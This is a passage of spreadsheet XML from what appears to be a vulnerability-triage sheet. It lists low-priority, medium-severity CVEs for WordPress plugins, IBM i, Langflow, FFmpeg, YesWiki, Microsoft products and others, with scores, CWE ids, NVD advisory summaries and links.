t="n"><v>0.002</v></c><c r="I1593" s="5" t="inlineStr" /><c r="J1593" s="5" t="inlineStr" /><c r="K1593" s="5" t="inlineStr" /><c r="L1593" s="5" t="inlineStr" /><c r="M1593" s="5" t="inlineStr" /><c r="N1593" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1593" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1593" s="5" t="inlineStr" /><c r="Q1593" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R1593" s="5" t="inlineStr"><is><t>The WPML Multilingual CMS plugin for WordPress is vulnerable to time-based SQL Injection via the ‘elementIds’ parameter in all versions up to, and including, 4.9.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This vulnerability is exploitable due to an authorization bypass where the registered authorization callback fails to execute, allowing any authenticated user regardless of role to access administrative translation functionalities.</t></is></c><c r="S1593" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-17509</t></is></c></row><row r="1594"><c r="A1594" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1594" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1594" s="5" t="inlineStr"><is><t>CVE-2026-18021</t></is></c><c r="D1594" s="5" t="n"><v>6.5</v></c><c r="E1594" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1594" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1594" s="5" t="inlineStr" /><c r="H1594" s="5" t="n"><v>0.003</v></c><c r="I1594" s="5" t="inlineStr" /><c r="J1594" s="5" t="inlineStr" /><c r="K1594" s="5" t="inlineStr" /><c r="L1594" s="5" t="inlineStr" /><c r="M1594" s="5" t="inlineStr" /><c r="N1594" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1594" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1594" s="5" t="inlineStr" /><c r="Q1594" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R1594" s="5" t="inlineStr"><is><t>The The Beaver Builder Page Builder – Drag and Drop Website Builder plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.10.3.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.</t></is></c><c r="S1594" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18021</t></is></c></row><row r="1595"><c r="A1595" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1595" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1595" s="5" t="inlineStr"><is><t>CVE-2026-18078</t></is></c><c r="D1595" s="5" t="n"><v>6.5</v></c><c r="E1595" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1595" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1595" s="5" t="inlineStr" /><c r="H1595" s="5" t="n"><v>0.003</v></c><c r="I1595" s="5" t="inlineStr" /><c r="J1595" s="5" t="inlineStr" /><c r="K1595" s="5" t="inlineStr"><is><t>ibm:i</t></is></c><c r="L1595" s="5" t="inlineStr" /><c r="M1595" s="5" t="inlineStr" /><c r="N1595" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1595" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1595" s="5" t="inlineStr" /><c r="Q1595" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R1595" s="5" t="inlineStr"><is><t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to cause a denial of service due to an integer overflow.</t></is></c><c r="S1595" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18078</t></is></c></row><row r="1596"><c r="A1596" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1596" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1596" s="5" t="inlineStr"><is><t>CVE-2026-18887</t></is></c><c r="D1596" s="5" t="n"><v>6.5</v></c><c r="E1596" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1596" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G1596" s="5" t="inlineStr" /><c r="H1596" s="5" t="n"><v>0.003</v></c><c r="I1596" s="5" t="inlineStr" /><c r="J1596" s="5" t="inlineStr" /><c r="K1596" s="5" t="inlineStr"><is><t>ibm:i</t></is></c><c r="L1596" s="5" t="inlineStr" /><c r="M1596" s="5" t="inlineStr" /><c r="N1596" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1596" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1596" s="5" t="inlineStr" /><c r="Q1596" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R1596" s="5" t="inlineStr"><is><t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow an authenticated attacker to obtain sensitive information in PASE. An attacker could exploit this vulnerability to access information about process they shouldn't be permitted to access.</t></is></c><c r="S1596" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18887</t></is></c></row><row r="1597"><c r="A1597" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1597" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1597" s="5" t="inlineStr"><is><t>CVE-2026-19299</t></is></c><c r="D1597" s="5" t="n"><v>6.5</v></c><c r="E1597" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1597" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G1597" s="5" t="inlineStr" /><c r="H1597" s="5" t="n"><v>0.005</v></c><c r="I1597" s="5" t="inlineStr" /><c r="J1597" s="5" t="inlineStr" /><c r="K1597" s="5" t="inlineStr"><is><t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t></is></c><c r="L1597" s="5" t="inlineStr" /><c r="M1597" s="5" t="inlineStr" /><c r="N1597" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1597" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1597" s="5" t="inlineStr" /><c r="Q1597" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1597" s="5" t="inlineStr"><is><t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to obtain sensitive information due to path traversal.</t></is></c><c r="S1597" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19299</t></is></c></row><row r="1598"><c r="A1598" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1598" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1598" s="5" t="inlineStr"><is><t>CVE-2026-19301</t></is></c><c r="D1598" s="5" t="n"><v>6.5</v></c><c r="E1598" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1598" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1598" s="5" t="inlineStr" /><c r="H1598" s="5" t="n"><v>0.003</v></c><c r="I1598" s="5" t="inlineStr" /><c r="J1598" s="5" t="inlineStr" /><c r="K1598" s="5" t="inlineStr"><is><t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t></is></c><c r="L1598" s="5" t="inlineStr" /><c r="M1598" s="5" t="inlineStr" /><c r="N1598" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1598" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1598" s="5" t="inlineStr" /><c r="Q1598" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1598" s="5" t="inlineStr"><is><t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to obtain sensitive information due to server-side request forgery.</t></is></c><c r="S1598" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19301</t></is></c></row><row r="1599"><c r="A1599" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1599" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1599" s="5" t="inlineStr"><is><t>CVE-2026-19302</t></is></c><c r="D1599" s="5" t="n"><v>6.5</v></c><c r="E1599" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1599" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G1599" s="5" t="inlineStr" /><c r="H1599" s="5" t="n"><v>0.005</v></c><c r="I1599" s="5" t="inlineStr" /><c r="J1599" s="5" t="inlineStr" /><c r="K1599" s="5" t="inlineStr"><is><t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t></is></c><c r="L1599" s="5" t="inlineStr" /><c r="M1599" s="5" t="inlineStr" /><c r="N1599" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1599" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1599" s="5" t="inlineStr" /><c r="Q1599" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1599" s="5" t="inlineStr"><is><t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to obtain sensitive information due to improper validation of symbolic links.</t></is></c><c r="S1599" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19302</t></is></c></row><row r="1600"><c r="A1600" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1600" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1600" s="5" t="inlineStr"><is><t>CVE-2026-19859</t></is></c><c r="D1600" s="5" t="n"><v>6.5</v></c><c r="E1600" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1600" s="5" t="inlineStr"><is><t>contact@wpscan.com</t></is></c><c r="G1600" s="5" t="inlineStr" /><c r="H1600" s="5" t="n"><v>0.002</v></c><c r="I1600" s="5" t="inlineStr" /><c r="J1600" s="5" t="inlineStr" /><c r="K1600" s="5" t="inlineStr" /><c r="L1600" s="5" t="inlineStr" /><c r="M1600" s="5" t="inlineStr" /><c r="N1600" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1600" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1600" s="5" t="inlineStr" /><c r="Q1600" s="5" t="inlineStr"><is><t>CWE-74</t></is></c><c r="R1600" s="5" t="inlineStr"><is><t>The JetFormBuilder WordPress plugin before 3.6.5.2 does not sanitize a request parameter before rendering it as message content, allowing unauthenticated users to execute arbitrary shortcodes registered on the site on any page displaying a form. Escaping is applied to that content before a later shortcode-expansion pass rather than after it, so the escaping can be bypassed.</t></is></c><c r="S1600" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19859</t></is></c></row><row r="1601"><c r="A1601" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1601" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1601" s="5" t="inlineStr"><is><t>CVE-2026-37009</t></is></c><c r="D1601" s="5" t="n"><v>6.5</v></c><c r="E1601" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1601" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1601" s="5" t="inlineStr" /><c r="H1601" s="5" t="n"><v>0.003</v></c><c r="I1601" s="5" t="inlineStr" /><c r="J1601" s="5" t="inlineStr" /><c r="K1601" s="5" t="inlineStr" /><c r="L1601" s="5" t="inlineStr" /><c r="M1601" s="5" t="inlineStr" /><c r="N1601" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1601" s="5" t="inlineStr"><is><t>2026-08-27</t></is></c><c r="P1601" s="5" t="inlineStr" /><c r="Q1601" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R1601" s="5" t="inlineStr"><is><t>A SQL injection vulnerability in NL2SQLTool in crewai-tools v1.10.2rc1 allows a remote attacker to execute arbitrary SQL commands via an unsanitized sql_query argument.</t></is></c><c r="S1601" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-37009</t></is></c></row><row r="1602"><c r="A1602" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1602" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1602" s="5" t="inlineStr"><is><t>CVE-2026-38345</t></is></c><c r="D1602" s="5" t="n"><v>6.5</v></c><c r="E1602" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1602" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1602" s="5" t="inlineStr" /><c r="H1602" s="5" t="n"><v>0.002</v></c><c r="I1602" s="5" t="inlineStr" /><c r="J1602" s="5" t="inlineStr" /><c r="K1602" s="5" t="inlineStr" /><c r="L1602" s="5" t="inlineStr" /><c r="M1602" s="5" t="inlineStr" /><c r="N1602" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1602" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1602" s="5" t="inlineStr" /><c r="Q1602" s="5" t="inlineStr"><is><t>CWE-369</t></is></c><c r="R1602" s="5" t="inlineStr"><is><t>A Division-by-Zero vulnerability in the ff_sws_init_single_context function (/libswscale/utils.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via a crafted input.</t></is></c><c r="S1602" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-38345</t></is></c></row><row r="1603"><c r="A1603" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1603" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1603" s="5" t="inlineStr"><is><t>CVE-2026-44766</t></is></c><c r="D1603" s="5" t="n"><v>6.5</v></c><c r="E1603" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1603" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1603" s="5" t="inlineStr" /><c r="H1603" s="5" t="n"><v>0.002</v></c><c r="I1603" s="5" t="inlineStr" /><c r="J1603" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1603" s="5" t="inlineStr" /><c r="L1603" s="5" t="inlineStr" /><c r="M1603" s="5" t="inlineStr" /><c r="N1603" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1603" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1603" s="5" t="inlineStr" /><c r="Q1603" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R1603" s="5" t="inlineStr"><is><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is></c><c r="S1603" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-44766</t></is></c></row><row r="1604"><c r="A1604" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1604" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1604" s="5" t="inlineStr"><is><t>CVE-2026-52763</t></is></c><c r="D1604" s="5" t="n"><v>6.5</v></c><c r="E1604" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1604" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1604" s="5" t="inlineStr" /><c r="H1604" s="5" t="n"><v>0.002</v></c><c r="I1604" s="5" t="inlineStr" /><c r="J1604" s="5" t="inlineStr" /><c r="K1604" s="5" t="inlineStr" /><c r="L1604" s="5" t="inlineStr" /><c r="M1604" s="5" t="inlineStr" /><c r="N1604" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1604" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1604" s="5" t="inlineStr" /><c r="Q1604" s="5" t="inlineStr"><is><t>CWE-1287, CWE-89</t></is></c><c r="R1604" s="5" t="inlineStr"><is><t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, the recentchanges action (actions/recentchanges.php) accepts a period argument from two disjoint parameter spaces. A whitelist validates only the URL form against ['day','week','month']. The action-argument form takes the else branch with no validation, and the value flows into PageManager::getRecentlyChanged(), where it is interpolated into a WHERE time &gt;= '...' ORDER BY time DESC clause without escaping or parameterization. UNION-based injection succeeds, the leaked rows render into the response page, so any visitor of the trigger page sees the exfiltrated data. The vulnerability provides arbitrary read of the YesWiki database to anyone who can save the trigger page. On a default install (default_write_acl='*'), this includes anonymous users, subject to the hashcash JS check on the page-edit form. Once the trigger page is saved, every subsequent view fires the injection as the SQLi is stored. Stored SQL injection is reachable through the page-edit flow, with arbitrary database read. This issue has been patched in version 4.6.6.</t></is></c><c r="S1604" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52763</t></is></c></row><row r="1605"><c r="A1605" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1605" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1605" s="5" t="inlineStr"><is><t>CVE-2026-53637</t></is></c><c r="D1605" s="5" t="n"><v>6.5</v></c><c r="E1605" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1605" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1605" s="5" t="inlineStr" /><c r="H1605" s="5" t="n"><v>0.003</v></c><c r="I1605" s="5" t="inlineStr" /><c r="J1605" s="5" t="inlineStr" /><c r="K1605" s="5" t="inlineStr" /><c r="L1605" s="5" t="inlineStr" /><c r="M1605" s="5" t="inlineStr" /><c r="N1605" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1605" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1605" s="5" t="inlineStr" /><c r="Q1605" s="5" t="inlineStr"><is><t>CWE-672, CWE-841</t></is></c><c r="R1605" s="5" t="inlineStr"><is><t>Sylius is an Open Source eCommerce Framework on Symfony. Versions 2.0.0 through 2.0.17, 2.1.0 through 2.1.14, and 2.2.0 through 2.2.5 contain an improper workflow enforcement vulnerability in the cart `FormComponent`. When an order is completed while its cart page remains open, the stale LiveComponent does not detect the order’s changed state and continues to permit cart actions, allowing an authenticated customer to modify or permanently delete an already completed order. Versions 2.0.18, 2.1.15, and 2.2.6 contain a patch. As a workaround, deployments can copy the patched `FormComponent` into the application's `src/` directory and override the `sylius_shop.twig.component.cart.form` service definition to use that class.</t></is></c><c r="S1605" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53637</t></is></c></row><row r="1606"><c r="A1606" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1606" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1606" s="5" t="inlineStr"><is><t>CVE-2026-55256</t></is></c><c r="D1606" s="5" t="n"><v>6.5</v></c><c r="E1606" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1606" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1606" s="5" t="inlineStr" /><c r="H1606" s="5" t="n"><v>0.003</v></c><c r="I1606" s="5" t="inlineStr" /><c r="J1606" s="5" t="inlineStr" /><c r="K1606" s="5" t="inlineStr" /><c r="L1606" s="5" t="inlineStr" /><c r="M1606" s="5" t="inlineStr" /><c r="N1606" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1606" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1606" s="5" t="inlineStr" /><c r="Q1606" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R1606" s="5" t="inlineStr"><is><t>In parsePartHeaders of multiple files, there is a possible persistent denial of service due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S1606" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55256</t></is></c></row><row r="1607"><c r="A1607" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1607" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1607" s="5" t="inlineStr"><is><t>CVE-2026-55545</t></is></c><c r="D1607" s="5" t="n"><v>6.5</v></c><c r="E1607" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1607" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1607" s="5" t="inlineStr" /><c r="H1607" s="5" t="n"><v>0.003</v></c><c r="I1607" s="5" t="inlineStr" /><c r="J1607" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1607" s="5" t="inlineStr" /><c r="L1607" s="5" t="inlineStr" /><c r="M1607" s="5" t="inlineStr" /><c r="N1607" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1607" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1607" s="5" t="inlineStr" /><c r="Q1607" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1607" s="5" t="inlineStr"><is><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is></c><c r="S1607" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55545</t></is></c></row><row r="1608"><c r="A1608" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1608" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1608" s="5" t="inlineStr"><is><t>CVE-2026-55549</t></is></c><c r="D1608" s="5" t="n"><v>6.5</v></c><c r="E1608" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1608" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1608" s="5" t="inlineStr" /><c r="H1608" s="5" t="n"><v>0.004</v></c><c r="I1608" s="5" t="inlineStr" /><c r="J1608" s="5" t="inlineStr" /><c r="K1608" s="5" t="inlineStr" /><c r="L1608" s="5" t="inlineStr" /><c r="M1608" s="5" t="inlineStr" /><c r="N1608" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1608" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1608" s="5" t="inlineStr" /><c r="Q1608" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1608" s="5" t="inlineStr"><is><t>Yamcs is a mission control framework. Prior to 5.9.4, Yamcs reflects an attacker-controlled redirect_uri parameter from GET /auth/authorize into yamcs-core/src/main/resources/auth/templates/authorize.html without adequate HTML escaping by yamcs-core/src/main/java/org/yamcs/http/auth/AuthHandler.java and yamcs-core/src/main/java/org/yamcs/http/HandlerContext.java. A crafted authorization URL can execute JavaScript when opened by a Yamcs user. The script can access browser-held authentication material and transmit it to an attacker, enabling account compromise. This issue is fixed in version 5.9.4.</t></is></c><c r="S1608" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55549</t></is></c></row><row r="1609"><c r="A1609" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1609" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1609" s="5" t="inlineStr"><is><t>CVE-2026-55855</t></is></c><c r="D1609" s="5" t="n"><v>6.5</v></c><c r="E1609" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1609" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1609" s="5" t="inlineStr" /><c r="H1609" s="5" t="n"><v>0.003</v></c><c r="I1609" s="5" t="inlineStr" /><c r="J1609" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1609" s="5" t="inlineStr" /><c r="L1609" s="5" t="inlineStr" /><c r="M1609" s="5" t="inlineStr" /><c r="N1609" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1609" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1609" s="5" t="inlineStr" /><c r="Q1609" s="5" t="inlineStr"><is><t>CWE-116, CWE-89</t></is></c><c r="R1609" s="5" t="inlineStr"><is><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is></c><c r="S1609" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55855</t></is></c></row><row r="1610"><c r="A1610" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1610" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1610" s="5" t="inlineStr"><is><t>CVE-2026-58649</t></is></c><c r="D1610" s="5" t="n"><v>6.5</v></c><c r="E1610" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1610" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1610" s="5" t="inlineStr" /><c r="H1610" s="5" t="n"><v>0.003</v></c><c r="I1610" s="5" t="inlineStr" /><c r="J1610" s="5" t="inlineStr" /><c r="K1610" s="5" t="inlineStr" /><c r="L1610" s="5" t="inlineStr" /><c r="M1610" s="5" t="inlineStr" /><c r="N1610" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1610" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1610" s="5" t="inlineStr" /><c r="Q1610" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="R1610" s="5" t="inlineStr"><is><t>Origin validation error in .NET allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1610" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58649</t></is></c></row><row r="1611"><c r="A1611" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1611" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1611" s="5" t="inlineStr"><is><t>CVE-2026-62437</t></is></c><c r="D1611" s="5" t="n"><v>6.5</v></c><c r="E1611" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1611" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1611" s="5" t="inlineStr" /><c r="H1611" s="5" t="n"><v>0.001</v></c><c r="I1611" s="5" t="inlineStr" /><c r="J1611" s="5" t="inlineStr" /><c r="K1611" s="5" t="inlineStr" /><c r="L1611" s="5" t="inlineStr" /><c r="M1611" s="5" t="inlineStr" /><c r="N1611" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1611" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1611" s="5" t="inlineStr" /><c r="Q1611" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="R1611" s="5" t="inlineStr"><is><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is></c><c r="S1611" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62437</t></is></c></row><row r="1612"><c r="A1612" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1612" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1612" s="5" t="inlineStr"><is><t>CVE-2026-62762</t></is></c><c r="D1612" s="5" t="n"><v>6.5</v></c><c r="E1612" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1612" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1612" s="5" t="inlineStr" /><c r="H1612" s="5" t="n"><v>0.008</v></c><c r="I1612" s="5" t="inlineStr" /><c r="J1612" s="5" t="inlineStr" /><c r="K1612" s="5" t="inlineStr" /><c r="L1612" s="5" t="inlineStr" /><c r="M1612" s="5" t="inlineStr" /><c r="N1612" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1612" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1612" s="5" t="inlineStr" /><c r="Q1612" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="R1612" s="5" t="inlineStr"><is><t>Null pointer dereference in Active Directory Domain Services allows an authorized attacker to deny service over a network.</t></is></c><c r="S1612" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62762</t></is></c></row><row r="1613"><c r="A1613" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1613" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1613" s="5" t="inlineStr"><is><t>CVE-2026-62801</t></is></c><c r="D1613" s="5" t="n"><v>6.5</v></c><c r="E1613" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1613" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1613" s="5" t="inlineStr" /><c r="H1613" s="5" t="n"><v>0.005</v></c><c r="I1613" s="5" t="inlineStr" /><c r="J1613" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K161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13" s="5" t="inlineStr" /><c r="M1613" s="5" t="inlineStr" /><c r="N1613" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1613" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1613" s="5" t="inlineStr" /><c r="Q1613" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1613" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="S1613" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62801</t></is></c></row><row r="1614"><c r="A1614" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1614" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1614" s="5" t="inlineStr"><is><t>CVE-2026-64918</t></is></c><c r="D1614" s="5" t="n"><v>6.5</v></c><c r="E1614" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1614" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1614" s="5" t="inlineStr" /><c r="H1614" s="5" t="n"><v>0.005</v></c><c r="I1614" s="5" t="inlineStr" /><c r="J1614" s="5" t="inlineStr" /><c r="K1614" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c 